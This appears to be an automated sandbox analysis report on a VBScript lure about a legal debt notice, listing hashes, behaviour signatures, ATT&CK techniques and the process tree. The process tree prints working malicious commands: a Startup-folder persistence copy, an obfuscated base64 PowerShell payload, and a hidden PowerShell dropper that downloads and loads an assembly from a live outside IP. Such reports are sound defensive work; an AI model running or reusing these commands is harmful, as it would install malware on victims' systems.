Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    04-01-2022 17:37

General

  • Target

    Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs

  • Size

    151KB

  • MD5

    375043101c2b371e5db90b0abdb0379d

  • SHA1

    8ca125b715a2f166ae8d24c87264f9beb4ddda6b

  • SHA256

    fffd645e0ed3e653627764842ea17cb464bae80ef48ddb3dbe54d1eddf6b1bb9

  • SHA512

    582ad71b82c9fd666a5c26738264aded5d226e1a2417f30e55f4b258c3c111caf18b15dcf9d0ffb48c1fa96a996a845cd9e64357925b0f29939252085d6ff416

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:464
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • Runs ping.exe
        PID:384
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')
        3⤵
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1148

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    d89aca5f4591e1e46e82f7d1d8fbceae

    SHA1

    8b454e6f4ebea813b4f41d23b257b493cdc9c3c0

    SHA256

    50c2b1115020547d9e96e69607c3d2352730f0675eb20ade7e39f1a091302ad2

    SHA512

    14e662f67fc2f22435d64b110d63d8d741566cc197a80b1acb29e16390af240061461b03332f6eeb9b30fef6aacf6d9574729d5aa6d0ae391b2f926dfdfccfc5

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    d89aca5f4591e1e46e82f7d1d8fbceae

    SHA1

    8b454e6f4ebea813b4f41d23b257b493cdc9c3c0

    SHA256

    50c2b1115020547d9e96e69607c3d2352730f0675eb20ade7e39f1a091302ad2

    SHA512

    14e662f67fc2f22435d64b110d63d8d741566cc197a80b1acb29e16390af240061461b03332f6eeb9b30fef6aacf6d9574729d5aa6d0ae391b2f926dfdfccfc5

  • memory/384-56-0x0000000000000000-mapping.dmp
  • memory/464-55-0x0000000000000000-mapping.dmp
  • memory/640-67-0x000000000247B000-0x000000000249A000-memory.dmp
    Filesize

    124KB

  • memory/640-57-0x0000000000000000-mapping.dmp
  • memory/640-62-0x0000000002474000-0x0000000002477000-memory.dmp
    Filesize

    12KB

  • memory/640-61-0x0000000002472000-0x0000000002474000-memory.dmp
    Filesize

    8KB

  • memory/640-60-0x0000000002470000-0x0000000002472000-memory.dmp
    Filesize

    8KB

  • memory/640-59-0x000007FEF2660000-0x000007FEF31BD000-memory.dmp
    Filesize

    11.4MB

  • memory/1068-54-0x000007FEFB591000-0x000007FEFB593000-memory.dmp
    Filesize

    8KB

  • memory/1148-71-0x0000000000000000-mapping.dmp
  • memory/1148-74-0x000007FEF1CC0000-0x000007FEF281D000-memory.dmp
    Filesize

    11.4MB

  • memory/1148-76-0x00000000025C0000-0x00000000025C2000-memory.dmp
    Filesize

    8KB

  • memory/1148-77-0x00000000025C2000-0x00000000025C4000-memory.dmp
    Filesize

    8KB

  • memory/1148-78-0x00000000025C4000-0x00000000025C7000-memory.dmp
    Filesize

    12KB

  • memory/1148-79-0x00000000025CB000-0x00000000025EA000-memory.dmp
    Filesize

    124KB

  • memory/1156-68-0x0000000002320000-0x0000000002322000-memory.dmp
    Filesize

    8KB

  • memory/1156-69-0x0000000002322000-0x0000000002324000-memory.dmp
    Filesize

    8KB

  • memory/1156-70-0x0000000002324000-0x0000000002327000-memory.dmp
    Filesize

    12KB

  • memory/1156-66-0x000007FEF1CC0000-0x000007FEF281D000-memory.dmp
    Filesize

    11.4MB

  • memory/1156-63-0x0000000000000000-mapping.dmp
  • memory/1156-75-0x000000000232B000-0x000000000234A000-memory.dmp
    Filesize

    124KB